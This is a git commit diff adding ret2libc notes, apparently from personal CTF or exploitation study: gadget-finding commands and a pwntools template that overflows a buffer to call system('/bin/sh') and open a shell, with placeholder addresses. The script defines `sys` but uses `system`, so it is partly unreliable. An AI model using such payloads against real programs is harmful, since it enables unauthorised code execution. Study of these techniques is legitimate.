ret2libc addition
This commit is contained in:
parent
b0e1d1a276
commit
0caf7edbf6
|
|
@ -41,7 +41,42 @@ readelf -s /lib32/libc.so.6 | grep system
|
||||||
* Architecture
|
* Architecture
|
||||||
* Calling convention
|
* Calling convention
|
||||||
|
|
||||||
## Usage
|
### Manually
|
||||||
|
|
||||||
|
```sh
|
||||||
|
ROPgadget --binary <file> | grep rdi
|
||||||
|
```
|
||||||
|
* Find `ret`s, to put in front of rdi
|
||||||
|
```sh
|
||||||
|
objdump -d <file> | grep ret
|
||||||
|
```
|
||||||
|
|
||||||
|
## Example without ASLR
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
p = process('<binary>')
|
||||||
|
|
||||||
|
cbase = 0x<libc_base>
|
||||||
|
sys = cbase + <libc_system>
|
||||||
|
sh = cbase + <libc_shell>
|
||||||
|
rop_rdi = <found rop rdi>
|
||||||
|
rop_ret = <found rop ret>
|
||||||
|
|
||||||
|
payload = b'A' * <count>
|
||||||
|
payload += b'B' * 8
|
||||||
|
payload += p64(rop_ret)
|
||||||
|
payload += p64(rop_rdi)
|
||||||
|
payload += p64(sh)
|
||||||
|
payload += p64(system)
|
||||||
|
payload += p64(0x0) # end payload
|
||||||
|
|
||||||
|
p.recv()
|
||||||
|
p.sendline(payload)
|
||||||
|
p.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
## Example with ASLR
|
||||||
* Create context
|
* Create context
|
||||||
```python
|
```python
|
||||||
#!/usr/bin/env python3
|
#!/usr/bin/env python3
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue